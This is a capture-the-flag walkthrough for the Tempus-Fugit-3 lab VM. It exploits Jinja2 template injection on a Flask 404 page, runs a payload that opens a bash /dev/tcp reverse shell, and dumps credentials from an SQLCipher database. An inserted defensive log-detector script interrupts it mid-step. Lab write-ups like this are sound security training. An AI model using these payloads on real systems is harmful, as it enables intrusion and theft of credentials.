Tempus-Fugit-3
Identifying the target host's IP address
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Tempus]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
Currently scanning: Finished! | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:11 1 60 Unknown vendor
192.168.56.100 08:00:27:0b:ee:12 1 60 PCS Systemtechnik GmbH
192.168.56.209 08:00:27:02:c5:6f 1 60 PCS Systemtechnik GmbH
On Kali Linux, netdiscover identifies the target host's IP address as 192.168.56.209.
NMAP scan
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Tempus]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.209 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2023-03-06 23:21 EST
Nmap scan report for localhost (192.168.56.209)
Host is up (0.00028s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp filtered ssh
80/tcp open http nginx 1.14.2
|_http-title: Tempus Fugit
|_http-server-header: nginx/1.14.2
MAC Address: 08:00:27:02:C5:6F (Oracle VirtualBox virtual NIC)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.39 seconds
The NMAP scan shows the target host has one open port: 80 (http); 22 is filtered? Is there port knocking involved?
Getting a shell
Browsing to port 80 in a browser, the page contains a Login link.
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Tempus]
└─$ curl http://192.168.56.209/robots.txt
<html>
<head>
<style>
h1 {
font-size:60px;
}
p {
color: red;
}
.float {
background-color: transparent;
width: 500;
height: 200;
position: fixed;
color: ffffff;
righ: 20%;
bottom: 50;
}
html {
background: url(static/img/confused.jpg) no-repeat center center fixed;
-webkit-background-size: cover;
-moz-background-size: cover;
-o-background-size: cover;
background-size: cover;
}
</style>
<title>Page Not Found</title>
<script language="JavaScript" type="text/javascript">
var seconds =6;
var url="/";
// variable for index.html url
function redirect(){
if (seconds <=0){
// redirect to new url after counter down.
window.location = url;
} else {
seconds--;
document.getElementById("pageInfo").innerHTML="Redirecting to Home Page after "
+seconds+" seconds."
setTimeout("redirect()", 1000)
}
}
</script>
</head>
<body onload="redirect()">
<p id="pageInfo"></p>
<div class="float">
<h1>404</h1>
<h3>Hmmm...<br> Page not found: http://192.168.56.209/robots.txt</h3>
</div>
</html>
When any nonexistent URL is entered, for example:
192.168.56.209/jlddouagugojgojgaojg
the page returns:
Redirecting to Home Page after 2 seconds.
404
In other words, there may be a server-side template injection vulnerability (similar to Django template rendering).
Verify with the following URL:
http://192.168.56.209/{{2+2}}
The page returns:
Redirecting to Home Page after 0 seconds.
404
Hmmm...
Page not found: http://192.168.56.209/4
The returned result proves that the server renders the path through a template engine.
Next, determine which template engine it is: if it is Jinja2, then {{9*9}} is evaluated first; otherwise it is some other template engine.
192.168.56.209/{{9*9}}
Hmmm...
Page not found: http://192.168.56.209/81
This shows it is Jinja2.
Check whether the following command can be executed:
{{request.application.__globals__.__builtins__.__import__('os').popen('id').read()}}
That is, visit the following URL:
192.168.56.209/{{request.application.__globals__.__builtins__.__import__('os').popen('id').read()}}
The page contains the following in its response:
Hmmm...
Page not found: http://192.168.56.209/uid=33(www-data) gid=33(www-data) groups=33(www-data)
This shows the command was executed successfully.
Next, get a reverse shell,
i.e.:
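From the defender's side, the probe sequence above (arithmetic in the path, then dunder attribute walking) leaves a distinctive trail in the nginx access log. The following is an added example, not part of the original writeup: a stdlib-only Python detector run over constructed nginx log lines modelled on those requests; the timestamps, sizes and user agents are invented.

```python
import re
from urllib.parse import unquote

# Constructed nginx access-log lines (combined format), modelled on the probes
# sent to the Flask 404 page in this walkthrough; not real logs from the VM.
SAMPLE_LOG = r"""
192.168.56.146 - - [06/Mar/2023:23:30:01 -0500] "GET /robots.txt HTTP/1.1" 404 1234 "-" "curl/7.87.0"
192.168.56.146 - - [06/Mar/2023:23:31:12 -0500] "GET /%7B%7B2+2%7D%7D HTTP/1.1" 404 1240 "-" "Mozilla/5.0"
192.168.56.146 - - [06/Mar/2023:23:31:40 -0500] "GET /{{9*9}} HTTP/1.1" 404 1241 "-" "Mozilla/5.0"
192.168.56.146 - - [06/Mar/2023:23:33:05 -0500] "GET /%7B%7Brequest.application.__globals__.__builtins__.__import__('os').popen('id').read()%7D%7D HTTP/1.1" 404 1290 "-" "Mozilla/5.0"
192.168.56.146 - - [06/Mar/2023:23:35:00 -0500] "GET /static/img/confused.jpg HTTP/1.1" 200 88213 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Jinja2 delimiters never belong in a URL path on this app; dunder attribute
# walking or process spawning turns a harmless probe into an RCE attempt.
DELIM_RE = re.compile(r"\{\{|\{%")
RCE_RE = re.compile(r"__(?:globals|builtins|import|class|mro|subclasses)__|popen|subprocess|os\.system")


def classify_target(raw_target):
    """Return 'rce', 'probe' or None for one logged request target."""
    decoded = unquote(unquote(raw_target))  # double-decode also catches %257B%257B
    if not DELIM_RE.search(decoded):
        return None
    return "rce" if RCE_RE.search(decoded) else "probe"


def scan_log(text):
    """Return (ip, timestamp, severity, decoded target) for each suspicious request."""
    findings = []
    for line in text.strip().splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined format
        sev = classify_target(m["target"])
        if sev:
            findings.append((m["ip"], m["ts"], sev, unquote(unquote(m["target"]))))
    return findings


if __name__ == "__main__":
    for ip, ts, sev, target in scan_log(SAMPLE_LOG):
        print(f"{sev.upper():5} {ip} {ts} {target}")
```

The 404 status on every hit is itself a tell here: the app evaluates the expression and then reports the path as not found, so the probe and its result both end up in the log.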
{{''.__class__.__mro__[1].__subclasses__()[373]("bash -c 'bash -i >& /dev/tcp/192.168.56.146/5555 0>&1'",shell=True,stdout=-1).communicate()[0].strip()}}
Visit the following URL:
192.168.56.209/{{''.__class__.__mro__[1].__subclasses__()[373]("bash -c 'bash -i >& /dev/tcp/192.168.56.146/5555 0>&1'",shell=True,stdout=-1).communicate()[0].strip()}}
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Tempus]
└─$ sudo nc -nlvp 5555
[sudo] password for kali:
listening on [any] 5555 ...
connect to [192.168.56.146] from (UNKNOWN) [192.168.56.209] 47088
bash: /root/.bashrc: Permission denied
www-data@TF3:/srv/flask_app$ which python
which python
/usr/local/bin/python
www-data@TF3:/srv/flask_app$ python -c 'import pty;pty.spawn("/bin/bash")'
python -c 'import pty;pty.spawn("/bin/bash")'
bash: /root/.bashrc: Permission denied
www-data@TF3:/srv/flask_app$
We now have a reverse shell from the target host.
www-data@TF3:/tmp$ which wget
which wget
www-data@TF3:/tmp$ which curl
which curl
The target host has neither wget nor curl.
www-data@TF3:/srv/flask_app$ cat app.py
cat app.py
from flask import Flask, render_template
import flask, flask_login
from urllib.parse import unquote
from pysqlcipher3 import dbapi2 as sqlcipher
app = Flask(__name__)
app.secret_key = 'RmxhZzF7IEltcG9ydGFudCBmaW5kaW5ncyB9'
pra = "pragma key='SecretssecretsSecrets...'"
try:
    with app.open_resource('static/file/f') as f:
        contents = f.read().decode("utf-8")
except:
    contents = ""
def validate(username, password):
    con = sqlcipher.connect("static/db2.db")
    con.execute(pra)
    completion = False
    with con:
        cur = con.cursor()
        cur.execute("SELECT * FROM Users")
        rows = cur.fetchall()
        for row in rows:
            uname = row[0]
            pw = row[1]
            if uname==username:
                completion=check_password(password, pw)
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Tempus]
└─$ echo 'RmxhZzF7IEltcG9ydGFudCBmaW5kaW5ncyB9' | base64 -d
Flag1{ Important findings }
www-data@TF3:/srv/flask_app/static$ sqlciphter db2.db --interactive
sqlciphter db2.db --interactive
bash: sqlciphter: command not found
www-data@TF3:/srv/flask_app/static$ sqlcipher db2.db --interactive
sqlcipher db2.db --interactive
SQLCipher version 3.15.2 2016-11-28 19:13:37
Enter ".help" for instructions
Enter SQL statements terminated with a ";"
sqlite> pragma key='SecretssecretsSecrets...';
pragma key='SecretssecretsSecrets...';
sqlite> .tables;
.tables;
Error: unknown command or invalid arguments: "tables;". Enter ".help" for help
sqlite> .tables
.tables
users
sqlite> select * from users;
select * from users;
hugh-janus|S0secretPassW0rd
anita-hanjaab|ssdf%dg5xc
clee-torres|asRtesa#2s
RmxhZzN7IEhleSwgcmVhZGluZyBzZWNyZXRzICB9|
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Tempus]
└─$ echo 'RmxhZzN7IEhleSwgcmVhZGluZyBzZWNyZXRzICB9' | base64 -d
Flag3{ Hey, reading secrets } s
Log in to the /login page with the username and password obtained above.
The returned page contains the following in an HTML comment:
RmxhZzJ7IElzIHRoaXMgdGhlIGZvb3Rob2xkIEkgaGF2ZSBiZWVuIGxvb2tpbmcgZm9yP30
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Tempus]
└─$ echo 'RmxhZzJ7IElzIHRoaXMgdGhlIGZvb3Rob2xkIEkgaGF2ZSBiZWVuIGxvb2tpbmcgZm9yP30' | base64 -d
Flag2{ Is this the foothold I have been looking for?}base64: invalid input
From: https://www.cnblogs.com/jason-huawen/p/17188672.html